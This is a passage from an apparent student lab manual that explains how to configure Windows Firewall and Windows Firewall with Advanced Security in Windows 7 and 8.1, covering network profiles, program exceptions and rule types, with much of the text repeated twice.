based on protocols, ports, addresses and authentication. By default, both firewalls come with
predefined set of rules that allow us to utilize network resources. This includes things like
browsing the web, receiving e-mails, etc. Other standard firewall exceptions are File and
Printer Sharing, Network Discovery, Performance Logs and Alerts, Remote
Administration, Windows Remote Management, Remote Assistance, Remote Desktop,
Windows Media Player, Windows Media Player Network Sharing Service

With firewall in Windows 7 we can configure inbound and outbound rules. By default, all
outbound traffic is allowed, and inbound responses to that traffic are also allowed. Inbound
traffic initiated from external sources is automatically blocked.

When we first connect to some network, we are prompted to select a network location.
This feature is known as Network Location Awareness(NLA). This feature enables us to
assign a network profile to the connection based on the location. Different network profiles
contain different collections of firewall rules. In Windows 7, different network profiles can
be configured on different interfaces. For example, our wired interface can have different
profile than our wireless interface. There are three different network profiles available:

• Public
• Home/Work - private network
• Domain - used within a domain

Configuring Windows Firewall

41
 lOMoARcPSD|24630861

To open Windows Firewall we can go to Start > Control Panel > Windows

Firewall.
By default, Windows Firewall is enabled for both private (home or work)and public
networks. It is also configured to block all connections to programs that are not on the list of
allowed programs. To configure exceptions we can go to the menu on the left and select
"Allow a program or feature trough Windows Firewall" option.

42
 lOMoARcPSD|24630861

Exceptions:

To change settings in this window we have to click the "Change settings" button. As you
can see, here we have a list of predefined programs and features that can be allowed to
communicate on private or public networks. For example, notice that the Core Networking
feature is allowed on both private and public networks, while the File and Printer Sharing is
only allowed on private networks. We can also see the details of the items in the list by
selecting it and then clicking the Details button.

Details

If we have a program on our computer that is not in this list, we can manually add it by
clicking on the "Allow another program" button.

Add a Program
Here we have to browse to the executable of our program and then click the Add button.

43
 lOMoARcPSD|24630861

Notice that we can also choose location types on which this program will be allowed to
communicate by clicking on the "Network location types" button.

Network Locations
Many applications will automatically configure proper exceptions in Windows Firewall
when we run them. For example, if we enable streaming from Media Player, it will
automatically configure firewall settings to allow streaming. The same thing is if we enable
Remote Desktop feature from the system properties window. By enabling Remote Desktop
feature we actually create an exception in Windows Firewall.

Windows Firewall can be turned off completely. To do that we can select the "Turn
Windows Firewall on or off" option from the menu on the left.

Firewall Customization

Note that we can modify settings for each type of network location (private or public).
Interesting thing here is that we can block all incoming connections, including those in the
list of allowed programs.

Windows Firewall is actually a Windows service. As you know, services can be stopped

and started. If the Windows Firewall service is stopped, the Windows Firewall will not
work.

Firewall Service

In our case the service is running. If we stop it, we will get a warning thatwe should
turn on our Windows Firewall.

44
 lOMoARcPSD|24630861

Warning

Remember that with Windows Firewall we can only configure basic firewall settings, and
this is enough for most day-to-day users. However, we can't configure exceptions based on
ports in Windows Firewall any more. For that we have to use Windows Firewall with
Advanced Security.

How to Start & Use the Windows Firewall with Advanced Security
The Windows Firewall with Advanced Security is a tool which gives you detailed control
over the rules that are applied by the Windows Firewall. You can view all the rules that are
used by the Windows Firewall, change their properties, create new rules or disable existing
ones. In this tutorial we will share how to open the Windows Firewall with Advanced
Security, how to find your way around it and talk about the types of rules that are available
and what kind of traffic they filter.

How to Access the Windows Firewall with Advanced Security

You have several alternatives to opening the Windows Firewall with Advanced Security:

One is to open the standard Windows Firewall window, by going to "Control Panel ->
System and Security -> Windows Firewall". Then, click or tap Advanced settings.

45
 lOMoARcPSD|24630861

In Windows 7, another method is to search for the word firewall in the Start Menu search
box and click the "Windows Firewall with Advanced Security" result.

In Windows 8.1, Windows Firewall with Advanced Security is not returned in search results
and you need to use the first method shared above foropening it.

The Windows Firewall with Advanced Security looks and works the same both in Windows
7 and Windows 8.1. To continue our tutorial, we will use screenshots that were made in
Windows 8.1.

What Are The Inbound & Outbound Rules?

In order to provide the security you need, the Windows Firewall has a standard set of
inbound and outbound rules, which are enabled depending on the location of the network
you are connected to.

Inbound rules are applied to the traffic that is coming from the network and the Internet to
your computer or device. Outbound rules apply to the traffic from your computer to the
network or the Internet.

These rules can be configured so that they are specific to: computers, users, programs,
services, ports or protocols. You can also specify to which type of network adapter (e.g.

46
 lOMoARcPSD|24630861

wireless, cable, virtual private network) or user profileit is applied to.

47
 lOMoARcPSD|24630861

In the Windows Firewall with Advanced Security, you can access all rulesand edit their
properties. All you have to do is click or tap the appropriate unit in the left-side panel.

The rules used by the Windows Firewall can be enabled or disabled. The ones which are
enabled or active are marked with a green check-box in the Name column. The ones that are
disabled are marked with a gray check-box.

If you want to know more about a specific rule and learn its properties, right click on it and
select Properties or select it and press Properties in thecolumn on right, which lists the
actions that are available for your selection.

48
 lOMoARcPSD|24630861

What Are The Connection Security Rules?

Connection security rules are used to secure traffic between two computers while it crosses
the network. One example would be a rule which defines that connections between two
specific computers must be encrypted.

Unlike the inbound or outbound rules, which are applied only to one computer, connection
security rules require that both computers have the same rules defined and enabled.

If you want to see if there are any such rules on your computer, click or tap "Connection
Security Rules" on the panel on the left. By default, there are no such rules defined on
Windows computers and devices. They are generally used in business environments and
such rules are set by the network administrator.

49
 lOMoARcPSD|24630861

What Does the Windows Firewall with Advanced Security Monitor?

The Windows Firewall with Advanced Security includes some monitoringfeatures as well. In
the Monitoring section you can find the following information: the firewall rules that are
active (both inbound and outbound),the connection security rules that are active and whether
there are any active security associations.

You should note that the Monitoring section shows only the active rules for the current
network location.

50
 lOMoARcPSD|24630861

used to determine the operating system running on the host machine. Another feature is
"boot-time filtering". This feature ensures that the firewall is working at the same time when
the network interface becomes active, which was not the case in previous versions of
Windows.

When we first connect to some network, we are prompted to select a network location. This
feature is known as Network Location Awareness (NLA). This feature enables us to assign a
network profile to the connection based on the location. Different network profiles contain
different collections of firewall rules. In Windows 7, different network profiles can be
configured on different interfaces. For example, our wired interface can have different
profile than our wireless interface. There are three different network profiles available:

• Public
• Home/Work - private network
• Domain - used within a domain
We choose those locations when we connect to a network. We can always change the
location in the Network and Sharing Center, in Control Panel. The Domain profile can
be automatically assigned by the NLA service when we log on to an Active Directory
domain. Note that we must have administrative rights in order to configure firewall in
Windows 7.
2.1.1 Configuring Windows Firewall
To open Windows Firewall we can go to Start > Control Panel >

51
 lOMoARcPSD|24630861

Windows Firewall.

By default, Windows Firewall is enabled for both private (home or work) and public
networks. It is also configured to block all connections to programs that are not on the list of
allowed programs. To configure exceptions we can go to the menu on the left and select
"Allow a program or feature trough Windows Firewall" option.

Exceptions

To change settings in this window we have to click the "Change settings" button. As you
can see, here we have a list of predefined programs and features that can be allowed to
communicate on private or public networks. For example, notice that the Core Networking
feature is allowed on both private and public networks, while the File and Printer Sharing is
only allowed on private networks. We can also see the details of the items in the list by
selecting it and then clicking the Details button.

52
 lOMoARcPSD|24630861

Details
If we have a program on our computer that is not in this list, we can

manually add it by clicking on the "Allow another program" button.

Add a Program
Here we have to browse to the executable of our program and then click the Add button.
Notice that we can also choose location types on which this program will be allowed to
communicate by clicking on the "Network location types" button.

53
 lOMoARcPSD|24630861

Network Locations
Many applications will automatically configure proper exceptions in Windows Firewall
when we run them. For example, if we enable streaming from Media Player, it will
automatically configure firewall settings to allow streaming. The same thing is if we enable
Remote Desktop feature from the system properties window. By enabling Remote Desktop
feature we actually create an exception in Windows Firewall.

Windows Firewall can be turned off completely. To do that we can select the "Turn
Windows Firewall on or off" option from the menu on the left.

Firewall Customization
Note that we can modify settings for each type of network location (private or public).
Interesting thing here is that we can block all incoming connections, including those in the
list of allowed programs.

Windows Firewall is actually a Windows service. As you know, services can be stopped and
started. If the Windows Firewall service is stopped, the Windows Firewall will not work.

54
 lOMoARcPSD|24630861

Firewall Service
In our case the service is running. If we stop it, we will get a warning thatwe should
turn on our Windows Firewall.

Warning

Remember that with Windows Firewall we can only configure basic firewall settings, and
this is enough for most day-to-day users. However, we can't configure exceptions based on
ports in Windows Firewall any more. For that we have to use Windows Firewall with
Advanced Security.

How to Start & Use the Windows Firewall with Advanced Security
The Windows Firewall with Advanced Security is a tool which gives you detailed control
over the rules that are applied by the Windows Firewall.You can view all the rules that
are used by the Windows Firewall, change their properties, create new rules or disable
existing ones. In this tutorial we will share how to open the Windows Firewall with
Advanced Security, howto find your way around it and talk about the types of rules that are
available and what kind of traffic they filter. How to Access the Windows Firewall with
Advanced Security

You have several alternatives to opening the Windows Firewall with Advanced Security:

55
 lOMoARcPSD|24630861

One is to open the standard Windows Firewall window, by going to "Control Panel ->
System and Security -> Windows Firewall". Then, click or tap Advanced settings.

In Windows 7, another method is to search for the word firewall in the Start Menu search
box and click the "Windows Firewall with Advanced Security" result.

56
 lOMoARcPSD|24630861

In Windows 8.1, Windows Firewall with Advanced Security is not returned in search results
and you need to use the first method shared above foropening it.

The Windows Firewall with Advanced Security looks and works the same both in Windows
7 and Windows 8.1. To continue our tutorial, we will use screenshots that were made in
Windows 8.1.

What Are The Inbound & Outbound Rules?

In order to provide the security you need, the Windows Firewall has a standard set of
inbound and outbound rules, which are enabled depending on the location of the network
you are connected to.
Inbound rules are applied to the traffic that is coming from the network and the Internet to
your computer or device. Outbound rules apply to the traffic from your computer to the
network or the Internet.
These rules can be configured so that they are specific to: computers, users, programs,
services, ports or protocols. You can also specify to which type of network adapter (e.g.
wireless, cable, virtual private network) or user profileit is applied to.
In the Windows Firewall with Advanced Security, you can access all rules and edit their
properties. All you have to do is click or tap the appropriate unit in the left-side panel.

57
 lOMoARcPSD|24630861

The rules used by the Windows Firewall can be enabled or disabled. The ones which are
enabled or active are marked with a green check-box in the Name column. The ones that are
disabled are marked with a gray check-box.If you want to know more about a specific rule
and learn its properties, right click on it and select Properties or select it and press
Properties in the column on right, which lists the actions that are available for your
selection.

58
2.1.1.1 What Are The Connection Security Rules?

Connection security rules are used to secure traffic between two computers while it crosses
the network. One example would be a rule which defines that connections between two
specific computers must be encrypted.
Unlike the inbound or outbound rules, which are applied only to one computer, connection
security rules require that both computers have the same rules defined and enabled.
If you want to see if there are any such rules on your computer, click or tap "Connection
Security Rules" on the panel on the left. By default, there are no such rules defined on
Windows computers and devices. They are generally used in business environments and
such rules are set by the network administrator.

59
 60

2.1.1.2 What Does the Windows Firewall with Advanced Security Monitor?
The Windows Firewall with Advanced Security includes some monitoring features as well.
In the Monitoring section you can find the following information: the firewall rules that are
active (both inbound and outbound), the connection security rules that are active and
whether there are any active security associations.

You should note that the Monitoring section shows only the active rules for the current
network location.

RESULT:
Thus the Study of the features of firewall in providing network security and to set
Firewall Security in windows was performed.

60
 61

61